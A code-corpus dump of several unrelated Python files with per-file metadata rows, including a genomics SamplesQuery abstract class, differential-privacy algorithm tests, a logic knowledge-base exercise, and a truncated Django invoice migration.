| 26.6 | 66 | 0.556391 | 118 | 1,330 | 6.067797 | 0.432203 | 0.075419 | 0.139665 | 0.162011 | 0.412011 | 0.412011 | 0.412011 | 0.178771 | 0.178771 | 0.178771 | 0 | 0.039414 | 0.332331 | 1,330 | 49 | 67 | 27.142857 | 0.766892 | 0.049624 | 0 | 0.547619 | 1 | 0 | 0.137986 | 0.018239 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
781de63e49673dee4a44df9891c8685afa780f2f | 705 | py | Python | naturtag/widgets/__init__.py | JWCook/inat-image-tagger | 2ba48ec849517b32cee1bfe9527f838a4f22cd94 | [
"MIT"
] | 1 | 2020-05-10T23:17:07.000Z | 2020-05-10T23:17:07.000Z | naturtag/widgets/__init__.py | JWCook/inat-image-tagger | 2ba48ec849517b32cee1bfe9527f838a4f22cd94 | [
"MIT"
] | 13 | 2020-05-23T14:56:39.000Z | 2020-05-24T03:35:21.000Z | naturtag/widgets/__init__.py | JWCook/inat-image-tagger | 2ba48ec849517b32cee1bfe9527f838a4f22cd94 | [
"MIT"
] | null | null | null | # flake8: noqa: F401
# isort: skip_file
from naturtag.widgets.layouts import (
FlowLayout,
GridLayout,
HorizontalLayout,
StylableWidget,
VerticalLayout,
)
from naturtag.widgets.autocomplete import TaxonAutocomplete
from naturtag.widgets.images import (
FullscreenPhoto,
HoverIcon,
HoverLabel,
IconLabel,
ImageWindow,
PixmapLabel,
)
from naturtag.widgets.inputs import IdInput
from naturtag.widgets.logger import QtRichHandler, init_handler
from naturtag.widgets.taxon_images import (
FullscreenTaxonPhoto,
HoverTaxonPhoto,
TaxonImageWindow,
TaxonInfoCard,
TaxonList,
TaxonPhoto,
)
from naturtag.widgets.toggle_switch import ToggleSwitch
| 23.5 | 63 | 0.763121 | 66 | 705 | 8.090909 | 0.621212 | 0.157303 | 0.249064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006885 | 0.175887 | 705 | 29 | 64 | 24.310345 | 0.91222 | 0.049645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.259259 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78234bcd26c7457083d86963328b249aac88507f | 795 | py | Python | tp4/tp4.py | WISSAL-MN/python13 | 0abb96d9f1c87db7db1d90ebca3457ea50a8f9ff | [
"MIT"
] | 2 | 2022-03-17T11:27:21.000Z | 2022-03-18T18:20:04.000Z | tp4/tp4.py | WISSAL-MN/python13 | 0abb96d9f1c87db7db1d90ebca3457ea50a8f9ff | [
"MIT"
] | null | null | null | tp4/tp4.py | WISSAL-MN/python13 | 0abb96d9f1c87db7db1d90ebca3457ea50a8f9ff | [
"MIT"
] | null | null | null | from logic import *
agent=PropKB()
P11, P12, P21, P22, P31, B11, B21 = expr('P11, P12, P21, P22, P31, B11, B21')
~P11
B11 | '<=>' | ((P12 | P21))
B21 | '<=>' | ((P11 | P22 | P31))
~B11
B21
agent.tell(~P11)
agent.tell(B11 | '<=>' | ((P12 | P21)))
agent.tell(B21 | '<=>' | ((P11 | P22 | P31)))
agent.tell(~B11)
agent.tell(B21)
#agent.ask_if_true(~P11)
#agent.ask_if_true(B11 | '<=>' | ((P12 | P21)))
#agent.ask_if_true(B21 | '<=>' | ((P11 | P22 | P31)))
#agent.ask_if_true(~B11)
#agent.ask_if_true(B21)
print(agent.ask_if_true(P12))
print(agent.ask_if_true(~P12))
print(agent.ask_if_true(P22))
print(agent.ask_if_true(~P22))
print(pl_resolution(agent,P12)
)
print(pl_resolution(agent,~P12)
)
print(pl_resolution(agent,P22)
)
print(pl_resolution(agent,~P22)
)
| 22.714286 | 78 | 0.612579 | 124 | 795 | 3.75 | 0.16129 | 0.154839 | 0.193548 | 0.270968 | 0.696774 | 0.434409 | 0.434409 | 0.290323 | 0.290323 | 0.135484 | 0 | 0.155689 | 0.159748 | 795 | 34 | 79 | 23.382353 | 0.540419 | 0.208805 | 0 | 0 | 0 | 0 | 0.076271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.32 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
782b6caf5a4de91a8a23894223eb006d6b1a0f80 | 369 | py | Python | startifact/parameters/__init__.py | cariad/startifact | ef0b855ca2061f9e6982ed28c63b3da4c5d1464d | [
"MIT"
] | null | null | null | startifact/parameters/__init__.py | cariad/startifact | ef0b855ca2061f9e6982ed28c63b3da4c5d1464d | [
"MIT"
] | 15 | 2021-11-09T13:22:57.000Z | 2021-12-17T12:24:27.000Z | startifact/parameters/__init__.py | cariad/startifact | ef0b855ca2061f9e6982ed28c63b3da4c5d1464d | [
"MIT"
] | null | null | null | from startifact.parameters.bucket import BucketParameter
from startifact.parameters.configuration import ConfigurationParameter
from startifact.parameters.latest_version import LatestVersionParameter
from startifact.parameters.parameter import Parameter
__all__ = [
"BucketParameter",
"ConfigurationParameter",
"LatestVersionParameter",
"Parameter",
]
| 30.75 | 71 | 0.826558 | 30 | 369 | 10 | 0.433333 | 0.186667 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 369 | 11 | 72 | 33.545455 | 0.914634 | 0 | 0 | 0 | 0 | 0 | 0.184282 | 0.119241 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
78437b78c7a6f9630875269c9c1bd77b0705e4c4 | 27,459 | py | Python | genomics_data_index/api/query/SamplesQuery.py | apetkau/thesis-index | 6c96e9ed75d8e661437effe62a939727a0b473fc | [
"Apache-2.0"
] | 1 | 2021-04-21T00:19:49.000Z | 2021-04-21T00:19:49.000Z | genomics_data_index/api/query/SamplesQuery.py | apetkau/thesis-index | 6c96e9ed75d8e661437effe62a939727a0b473fc | [
"Apache-2.0"
] | null | null | null | genomics_data_index/api/query/SamplesQuery.py | apetkau/thesis-index | 6c96e9ed75d8e661437effe62a939727a0b473fc | [
"Apache-2.0"
] | null | null | null | from __future__ import annotations
import abc
from typing import Union, List, Set, Tuple
import numpy as np
import pandas as pd
from ete3 import Tree
from genomics_data_index.api.query.kind.IsaKind import IsaKind
from genomics_data_index.storage.SampleSet import SampleSet
from genomics_data_index.storage.model.QueryFeature import QueryFeature
class SamplesQuery(abc.ABC):
"""
The base class for queries related to samples. The different query methods in a SamplesQuery
operate on a set of samples (specifically a set of Sample identifiers,
see :py:class:`genomics_data_index.storage.SampleSet`) and returns a new SamplesQuery consisting of the
subset of samples matching the defined critera.
That is to say, if A = SamplesQuery(), then B = A.method() will consist of a subset of A matching the criteria
defined by A.method().
Multiple subtypes of SamplesQuery exist which may provided access to data joined to a set of Samples for
implementing different queries (e.g., a :py:class:`genomics_data_index.api.query.impl.TreeSamplesQuery` provides
a tree joined to a SampleSet and methods to query based on the tree.
"""
ALL_SAMPLES = SampleSet.create_all()
def __init__(self):
pass
@property
@abc.abstractmethod
def universe_set(self) -> SampleSet:
"""
The set of samples :py:class:`genomics_data_index.storage.SampleSet` defining the universe under consideration
for this SamplesQuery. Useful for e.g., complement() functionality.
:returns: A SampleSet.
"""
pass
@property
@abc.abstractmethod
def sample_set(self) -> SampleSet:
"""
The set of selected samples :py:class:`genomics_data_index.storage.SampleSet` in this query.
:returns: A SampleSet defining the selected samples of this query.
"""
pass
@property
@abc.abstractmethod
def unknown_set(self) -> SampleSet:
"""
The set of samples :py:class:`genomics_data_index.storage.SampleSet` for which it is unknown
whether they match this query or not (e.g., due to missing/unknown data on a region of the genome).
:returns: A SampleSet defining the samples where it is unknown if they match the query or not.
"""
pass
@property
@abc.abstractmethod
def absent_set(self) -> SampleSet:
"""
The set of samples :py:class:`genomics_data_index.storage.SampleSet` for which the query does not match.
:returns: A SampleSet defining the samples where the query does not match.
"""
pass
@abc.abstractmethod
def join(self, data_frame: pd.DataFrame, sample_ids_column: str = None,
sample_names_column: str = None, default_isa_kind: str = 'names',
default_isa_column: str = None) -> SamplesQuery:
"""
Joins the passed dataframe onto the current query using the passed column name in the dataframe.
The column can either contain sample IDs (in sample_ids_column) or sample names (sample_names_column).
This will modify the universe set to the subset of samples found within the passed data frame.
:param data_frame: The data frame to join on.
:param sample_ids_column: The column name in the data frame containing internal sample IDs used for joining.
:param sample_names_column: The column name in the data frame containing sample names to join on.
Internally these will be mapped to Sample IDs.
:param default_isa_kind: The default 'kind' parameter to isa(data, kind=kind, ...) queries. This is used
to simplify queries after joining with a dataframe in cases where you want
isa() to select by a particular column in the dataframe.
:param default_isa_column: If default_isa_kind is set to 'dataframe' sets the default column to use for
isa() queries.
:return: A SamplesQuery representing the query joined with the data frame.
"""
pass
@abc.abstractmethod
def toframe(self, include_present: bool = True, include_unknown: bool = False,
include_absent: bool = False) -> pd.DataFrame:
"""
Converts the selected set of samples to a DataFrame with one row per sample. By default only samples selected
by this query will be returned (include_present = True). Setting include_absent to True will include all samples
where the current query is False, while include_unknown will return all samples where it is unknown if the
query is True or False (that is, it is unknown if these samples match the query).
:param include_present: Whether or not samples matching the query should be included.
:param include_unknown: Whether or not samples where it is unknown if they match the query or not should be included.
:param include_absent: Whether or not samples absent from this query (but in the universe of samples) should be
included.
:return: A DataFrame of the samples in this query, one row per sample. The 'Status' column of the dataframe
contains the status (Present, Absent, or Unknown) of the sample.
"""
pass
@abc.abstractmethod
def summary(self) -> pd.DataFrame:
"""
Summarizes the selected samples in a DataFrame. This includes the number present and absent in the selection
as well as percents.
:return: A DataFrame summarizing the selected samples.
"""
pass
@abc.abstractmethod
def select_absent(self) -> SamplesQuery:
"""
Creates a new query with only the absent samples selected.
:return: A new query with only the absent samples selected.
"""
pass
@abc.abstractmethod
def select_present(self) -> SamplesQuery:
"""
Creates a new query with only the present samples selected (minus unknowns).
:return: A new query with only the present samples selected (minus unknowns).
"""
pass
@abc.abstractmethod
def select_unknown(self) -> SamplesQuery:
"""
Creates a new query with only the unknown samples selected.
:return: A new query with only the unknown samples selected.
"""
pass
@abc.abstractmethod
def features_summary(self, kind: str = 'mutations', selection: str = 'all',
include_present_features: bool = True, include_unknown_features: bool = False,
**kwargs) -> pd.DataFrame:
"""
Summarizes the selected features in a DataFrame. Please specify the kind of features with the kind parameter.
The `selection` parameter is used to define how to select features in the set of samples. If set to `unique`
then only those features unique to the selected samples will be returned. Otherwise, if set to `all` then all
features found in the selected samples are returned (even those that are also found in other samples in the universe).
For example, say you have a set of samples S = {A, B, C} and features F = {1:A:C, 2:G:T, 3:C:T}. Lets
also assume that sample A has {1:A:C, 2:G:T}, sample B has {2:G:T, 3:C:T} and sample C has {2:G:T}.
Also lets assume we have a query q = {A, B} (that is a query has selected two samples A and B).
Then q.summary_features(selection='all') will return a data frame with features {1:A:C, 2:G:T, 3:C:T} (since
those are found in either sample A or B).
However, q.summary_features(selection='unique') will return a data frame with features {1:A:C, 3:C:T} since
these features are only found in samples A and B (the feature 2:G:T is found in sample C).
:param kind: The kind of feature to summarize. By default this is *mutations*.
:param selection: The method used to select features. Use 'all' (default) to select all features present in
at least one of the selected samples in this query. Use 'unique' to select only those features
that are present in the selected samples of this query
(and nowhere else in the universe of samples).
:param include_present_features: Will determine if present (i.e., not unknown) features should be included.
:param include_unknown_features: Will determine if unknown features should be included.
:param **kwargs: Additional keyword arguments. Please see the documentation for the underlying implementation.
:return: A DataFrame summarizing the features within the selected samples.
"""
pass
@abc.abstractmethod
def features_comparison(self, sample_categories: Union[List[SamplesQuery], List[SampleSet], str],
category_prefixes: List[str] = None,
categories_kind: str = 'samples',
kind: str = 'mutations',
unit: str = 'percent',
category_samples_threshold: int = None,
**kwargs) -> pd.DataFrame:
"""
Creates a dataframe which compares different categories of samples with each other with respect to features.
For example, if kind=='mutations', compare_kind == 'percent' and there are two sample_categories then
this will return dataframe like:
| Mutation | Total | Category1_percent | Category2_percent | Category1_total | Category2_total |
| ref:100:A:T | 10 | 50% | 100% | 8 | 2 |
| ref:200:CT:C | 10 | 100% | 0% | 8 | 2 |
| ... | ... | ... | ... | 8 | 2 |
Here, "Category1_percent" is the percent of samples in Category1 that have this mutation/feature
(50% or 4 out of 8 samples in Category1). "Category2_percent" is the percent of samples in Category2 with the
feature (100% or 2 out of 2 samples in Category2).
"Category1_total" and "Category2_total" are the total samples in each category. "Total" is the total
samples in the overall query that form the universe from which we are defining "Category1" and "Category2".
Note: since categories are defined based on sample queries, there is no enforcement that categories are
mutually exclusive (that is, "Category1_total" + "Category2_total" will not always equal "Total"). This
is done on purpose in case the categories you wish to compare are not mutually exclusive.
:param sample_categories: The different categories to compare. Either specify as lists of SampleQuery, SampleSet
or a string.
:param kind: The kind of features to compare.
:param categories_kind: The kind of category to use ("sample_set", or "dataframe").
:param category_prefixes: The prefixes to use for the different categories (defaults to 1, 2, 3, ...).
:param unit: The type of data to compare in each category (either 'percent', 'proportion', or 'count').
:param category_samples_threshold: A threshold on the number of samples in a category for it to be considered.
:param **kwargs: Additional keyword arguments. Please see the documentation for the underlying implementation.
:return: A dataframe comparing each category with respect to the differences in features.
"""
pass
@abc.abstractmethod
def tofeaturesset(self, kind: str = 'mutations', selection: str = 'all',
include_present_features: bool = True, include_unknown_features: bool = False) -> Set[str]:
"""
Returns all features as a set of strings for the selected samples.
:param kind: The kind of feature to summarize. By default this is *mutations*.
:param selection: The method used to select features. Use 'all' (default) to select all features.
Use 'unique' to select only those features unique to the selected samples.
:param include_present_features: Will determine if present (i.e., not unknown) features should be included.
:param include_unknown_features: Will determine if unknown features should be included.
:return: A set of feature identifiers derived from the selected samples.
"""
pass
@abc.abstractmethod
def intersect(self, sample_set: SampleSet, query_message: str = None) -> SamplesQuery:
"""
Intersects this SamplesQuery with the given :py:class:`genomics_data_index.storage.SampleSet`.
Appends the given *query_message* to the list of query messages.
:param sample_set: The :py:class:`genomics_data_index.storage.SampleSet` to intersect.
:param query_message: A message to include as part of the query messages.
:return: A new SamplesQuery which is the intersection of this query and the passed set.
"""
pass
@abc.abstractmethod
def and_(self, other: SamplesQuery) -> SamplesQuery:
"""
Performs an AND operation (intersection) on this query with another query.
That is if A and B are sample queries then C = A.and_(B) means that C consists of samples in the intersection
of A and B (C consists of samples that are in A AND B).
:param other: The other SamplesQuery to use.
:return: A new SamplesQuery which is the intersection of this query and the other query.
"""
pass
@abc.abstractmethod
def or_(self, other: SamplesQuery) -> SamplesQuery:
"""
Performs an OR operation (union) on this query with another query.
That is if A and B are sample queries then C = A.or_(B) means that C consists of samples in the union
of A and B (C consists of samples that are in A OR B).
:param other: The other SamplesQuery to use.
:return: A new SamplesQuery which is the union of this query and the other query.
"""
pass
@abc.abstractmethod
def subsample(self, k: Union[int, float], include_unknown: bool = False, seed: int = None) -> SamplesQuery:
"""
Select a random subsample of genomic samples from this query.
:param k: If k >= 1, select this number of samples. If k < 1, select this proportion of samples
(e.g., 0.5 means select 50% of the samples in the query).
:param include_unknown: Whether unknown samples should be included in the subsample. If True,
then the value given by n will apply to both unknown and present samples.
:param seed: The seed for the random number generator (defaults to picking a random seed).
:return: A new SamplesQuery that selects a random subsample of the genomic samples in the current query.
"""
pass
@abc.abstractmethod
def build_tree(self, kind: str, **kwargs) -> SamplesQuery:
"""
Builds a tree from the samples contained in this query using the passed *kind* of features.
:param kind: The *kind* of features to use.
:param **kwargs: See documentation for the underlying implementation.
:return: A new SamplesQuery which has a tree attached to it to be used for additional querying.
"""
pass
@abc.abstractmethod
def join_tree(self, tree: Tree, kind='mutation', **kwargs) -> SamplesQuery:
"""
Joins a tree to this SamplesQuery representing a tree defined by the passed *kind* of features.
:param tree: The tree to join to this query.
:param kind: The *kind* of features that were used to build the tree
(used to define what type of tree we are joining/the distance units).
:param **kwargs: See documentation for the underlying implementation.
:return: A new SamplesQuery which has the passed tree attached to it to be used for additional querying.
"""
pass
@abc.abstractmethod
def reset_universe(self, include_unknown: bool = True) -> SamplesQuery:
"""
Resets the *universe* set to be the set of currently selected samples.
That is, if `A` is a SamplesQuery consisting of some selected samples, then
`B = A.reset_universe()` implies that `B.universe_set == A`.
:param include_unknown: Whether or not unknown matches should be included in the universe.
:return: A SamplesQuery with the universe reset to whatever is selected.
"""
pass
@abc.abstractmethod
def set_universe(self, universe_set: SampleSet, query_message: str = None) -> SamplesQuery:
"""
Sets the *universe* set to be equal to the passed set. Will intersect any selected/unknown sample sets.
That is, if `A` is a SamplesQuery consisting of some selected samples and `U` is a universe of samples, then
`B = A.set_universe(U)` implies that: (1) `B.universe_set == U`, (2) `B.sample_set == A.sample_set.intersect(U)`,
(3) `B.unknown_set == A.unknown_set.intersect(U)`, and (4) `B.absent_set == A.absent_set.intersect(U)`.
:param universe_set: The new universe set.
:param query_message: An (optional) message to append to the query message string representing this operation.
:return: A SamplesQuery with the universe set to the passed set.
"""
pass
@abc.abstractmethod
def hasa(self, property: Union[QueryFeature, str, pd.Series], kind='mutation') -> SamplesQuery:
"""
Queries for samples that have a (**hasa**) particular feature/property. That is if `A` is a SamplesQuery
and `m` is a mutation, then A.hasa(m) selects all those samples of A that have the mutation m.
:param property: The particular property/feature to query by. This can be either QueryFeature defining
the particular feature, a string defining the feature, or a pandas Series consisting of boolean values
which is the result of a DataFrame selection expression.
:param kind: The kind of *property* that was passed.
:return: A new SamplesQuery consisting of those samples that have the passed property.
"""
pass
def has(self, property: Union[QueryFeature, str, pd.Series], kind='mutation') -> SamplesQuery:
"""
Queries for samples that have a particular property. Synonym for hasa().
"""
return self.hasa(property=property, kind=kind)
@abc.abstractmethod
def complement(self):
"""
Returns the complement of the selected set of samples in the SamplesQuery.
That is if A is a SamplesQuery with U = A.universe_set, then B = A.complement() will result in a
SamplesQuery, B, consisting of all those samples in U not in A.
:return: The complement of this SamplesQuery.
"""
pass
def within(self, data: Union[str, List[str], SamplesQuery, SampleSet], **kwargs) -> SamplesQuery:
"""
Queries for samples within a particular distance. This is identical to calling
isin(data, kind='distance', ...). Used to help make code easier to read.
:param data: The data to use for selecting samples by (e.g., the samples being used to measure distance against).
:param **kwargs: Other arguments for the the internal implementations.
:return: A SamplesQuery with the matched samples.
"""
return self.isin(data=data, kind='distance', **kwargs)
@abc.abstractmethod
def _within_distance(self, data: Union[str, List[str], SamplesQuery, SampleSet], distance: float, units: str,
**kwargs) -> SamplesQuery:
pass
@abc.abstractmethod
def _distance_units(self) -> List[str]:
pass
@abc.abstractmethod
def isa(self, data: Union[str, List[str], SamplesQuery, SampleSet], kind: Union[IsaKind, str] = 'sample',
**kwargs) -> SamplesQuery:
"""
Queries for samples which are a particular type/belong to a particular category.
Read as "subset samples which are a (isa) particular type defined by 'data'".
The default implementation will select samples by sample name but this type of query is also useful when used
with an attached dataframe (at which point it selects based on matches to a column,
see documentation for :py:class:`genomics_data_index.api.query.impl.DataFrameSamplesQuery`).
:param data: The data to match.
:param kind: The particular kind of data passed.
:**kwargs: Arguments for the underlying implementation.
:return: A SamplesQuery with the matched samples.
"""
pass
def isan(self, data: Union[str, List[str], SamplesQuery, SampleSet], kind: str = None,
**kwargs) -> SamplesQuery:
"""
Synonym for isa()
"""
return self.isa(data=data, kind=kind, **kwargs)
@abc.abstractmethod
def isin(self, data: Union[str, List[str], pd.Series, SamplesQuery, SampleSet], kind: str = None,
**kwargs) -> SamplesQuery:
"""
Queries for samples which are in (isin) the passed data. This can have a number of interpretations
depending on the passed kind
1. If kind == 'sample' (or 'samples') then isin(['Name']) returns a set of samples with one of the passed names.
2. If kind == 'distance' (or 'distances') then isin(['Name']) returns a set of samples that are within
a particular distance of the passed samples.
:param data: The data to match. This could be a list of strings (representing sample names) or a SampleSet or
SamplesQuery representing a set of samples.
:param kind: The particular kind of data passed.
:**kwargs: Arguments for the underlying implementation.
:return: A SamplesQuery with the matched samples.
"""
pass
@abc.abstractmethod
def _get_sample_names_query_infix_from_data(self, data: Union[str, List[str], pd.Series, SamplesQuery, SampleSet]
) -> Tuple[Set[str], str]:
pass
@abc.abstractmethod
def _can_handle_isin_kind(self, kind: str) -> bool:
pass
@abc.abstractmethod
def _can_handle_isa_kind(self, kind: str) -> bool:
pass
@abc.abstractmethod
def _isa_kinds(self) -> List[str]:
pass
@abc.abstractmethod
def _isin_kinds(self) -> List[str]:
pass
@abc.abstractmethod
def to_distances(self, kind: str, **kwargs) -> Tuple[np.ndarray, List[str]]:
"""
Returns a distance-matrix representing the pairwise distances between all selected samples.
:param kind: The features kind used to generate the distance matrix (e.g,. 'mutations', or 'kmer').
:param **kwargs: Additional arguments depending on the implementation.
:return: A Tuple consisting of a pairwise distance matrix (as a NumPy array) and a list of labels of the distance
matrix (sample names).
"""
pass
@abc.abstractmethod
def _get_has_kinds(self) -> List[str]:
pass
@abc.abstractmethod
def is_empty(self, include_unknown=False) -> bool:
"""
Whether or not the selected set of samples is empty.
:param include_unknown: Whether or not to include samples with unknown status.
:return: True if the selected set of samples is empty, False otherwise.
"""
pass
@abc.abstractmethod
def query_expression(self) -> str:
"""
A string representing the series of queries performed to select the given samples in this SamplesQuery.
For example if A is a SamplesQuery then `A.query_expression() == "hasa('mutation') AND hasa('mutation2')"
would mean that the SamplesQuery A represents samples that have both 'mutation' and 'mutation2'.
:return: A string representing the set of queries performed to generate this set.
"""
pass
@property
@abc.abstractmethod
def tree(self):
"""
If this SamplesQuery has a joined tree, then returns the tree.
:return: An ete3.Tree that has been joined to this SamplesQuery (or raises an exception if no tree).
"""
pass
@abc.abstractmethod
def has_tree(self) -> bool:
"""
Whether or not this SamplesQuery has a joined tree.
:return: True if this SamplesQuery has a joined tree, False otherwise.
"""
pass
@abc.abstractmethod
def tolist(self, names: bool = True, include_present: bool = True,
include_unknown: bool = False, include_absent: bool = False) -> Union[List[str], List[int]]:
"""
Converts the set of selected samples into a list of either sample names or sample IDs.
:param names: If True (default) return a list of sample names as strings, if False return a list of sample IDs.
:param include_present: If True (default) include selected samples.
:param include_unknown: If True, include unknown samples.
:param include_absent: If True, include absent samples from selection.
:return: A list of sample names or IDs.
"""
pass
@abc.abstractmethod
def toset(self, names: bool = True, include_present: bool = True,
include_unknown: bool = False, include_absent: bool = False) -> Union[Set[str], Set[int]]:
"""
Converts the set of selected samples into a set of either sample names or sample IDs.
:param names: If True (default) return a set of sample names as strings, if False return a set of sample IDs.
:param include_present: If True (default) include selected samples.
:param include_unknown: If True, include unknown samples.
:param include_absent: If True, include absent samples from selection.
:return: A set of sample names or IDs.
"""
pass
def __invert__(self):
"""
Performs an **~** (invert, complement) operation on a SamplesQuery object.
If A is a SamplesQuery object then `~A` is equivalent to `A.complement()`.
:return: The complement of a SamplesQuery object.
"""
return self.complement()
def __and__(self, other):
"""
Performs an **&** (and) operation (intersection) between two different SamplesQuery objects.
If A and B are two SamplesQuery objects then `A & B` is equivalent to `A.and_(B)`.
:return: The and (intersection) of two SamplesQuery objects.
"""
return self.and_(other)
def __or__(self, other):
"""
Performs an **|** (or) operation (union) between two different SamplesQuery objects.
If A and B are two SamplesQuery objects then `A | B` is equivalent to `A.or_(B)`.
:return: The or (union) of two SamplesQuery objects.
"""
return self.or_(other)
@abc.abstractmethod
def __len__(self):
"""
The number of selected samples.
:return: The number of selected samples.
"""
pass
| 47.180412 | 126 | 0.652136 | 3,642 | 27,459 | 4.858045 | 0.109006 | 0.039394 | 0.046346 | 0.043407 | 0.46346 | 0.391511 | 0.344769 | 0.287628 | 0.261064 | 0.2189 | 0 | 0.004162 | 0.273681 | 27,459 | 581 | 127 | 47.261618 | 0.882972 | 0.659784 | 0 | 0.546512 | 0 | 0 | 0.012848 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.27907 | false | 0.244186 | 0.052326 | 0 | 0.377907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7843f99fa555b9a42a97484361243439238612ae | 1,188 | py | Python | tests/test_algorithms.py | fossabot/StatDP | 91cf5a646acdd3b332979211d3b6db89dffe3153 | [
"MIT"
] | null | null | null | tests/test_algorithms.py | fossabot/StatDP | 91cf5a646acdd3b332979211d3b6db89dffe3153 | [
"MIT"
] | null | null | null | tests/test_algorithms.py | fossabot/StatDP | 91cf5a646acdd3b332979211d3b6db89dffe3153 | [
"MIT"
] | null | null | null | from statdp.algorithms import *
def test_noisymax():
# add no noise to the array
assert noisy_max_v1a([1, 2, 1], float('inf')) == 1
assert noisy_max_v1b([1, 3, 1], float('inf')) == 3
assert noisy_max_v2a([1, 3, 1], float('inf')) == 1
assert noisy_max_v2b([1, 3, 1], float('inf')) == 3
def test_sparsevector():
assert sparse_vector_lyu([1, 2, 3, 4], float('inf'), 1, 2.5) == 2
assert sparse_vector_1([1, 2, 3, 4], float('inf'), 1, 1.5) == 1
assert sparse_vector_1([1, 2, 3, 4], float('inf'), 1, 3.5) == 1
assert sparse_vector_2([1, 2, 3, 4], float('inf'), 1, 1.5) == 1
assert sparse_vector_2([1, 2, 3, 4], float('inf'), 1, 3.5) == 1
assert sparse_vector_3([1, 2, 3, 4], float('inf'), 1, 1.5) == 1
assert sparse_vector_3([1, 2, 3, 4], float('inf'), 1, 3.5) == 1
assert sparse_vector_4([1, 2, 3, 4], float('inf'), 1, 2) == 2
def test_histogram():
assert histogram([1, 2], float('inf')) == 1
assert isinstance(histogram([1, 2], 1), float)
assert histogram_eps([1, 2], 0) == 1
assert isinstance(histogram_eps([1, 2], 1), float)
def test_laplace_mechanism():
assert laplace_mechanism([1, 2, 3], float('inf')) == 1
| 37.125 | 69 | 0.588384 | 212 | 1,188 | 3.146226 | 0.174528 | 0.047976 | 0.161919 | 0.047976 | 0.494753 | 0.491754 | 0.455772 | 0.383808 | 0.341829 | 0.341829 | 0 | 0.112395 | 0.198653 | 1,188 | 31 | 70 | 38.322581 | 0.588235 | 0.021044 | 0 | 0 | 0 | 0 | 0.036176 | 0 | 0 | 0 | 0 | 0 | 0.772727 | 1 | 0.181818 | true | 0 | 0.045455 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7847a27238af0ef5906a293df2a1d3597c2a98b5 | 7,449 | py | Python | workbench/invoices/migrations/0001_initial.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 15 | 2020-09-02T22:17:34.000Z | 2022-02-01T20:09:10.000Z | workbench/invoices/migrations/0001_initial.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 18 | 2020-01-08T15:28:26.000Z | 2022-02-28T02:46:41.000Z | workbench/invoices/migrations/0001_initial.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 8 | 2020-09-29T08:00:24.000Z | 2022-01-16T11:58:19.000Z | # Generated by Django 2.1.7 on 2019-03-04 21:39
from decimal import Decimal
import django.core.validators
import django.db.models.deletion
import django.utils.timezone
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("contacts", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"subtotal",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="subtotal",
),
),
(
"discount",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="discount",
),
),
(
"liable_to_vat",
models.BooleanField(
default=True,
help_text="For example invoices to foreign institutions are not liable to VAT.",
verbose_name="liable to VAT",
),
),
(
"tax_rate",
models.DecimalField(
decimal_places=2,
default=Decimal("7.7"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="tax rate",
),
),
(
"total",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
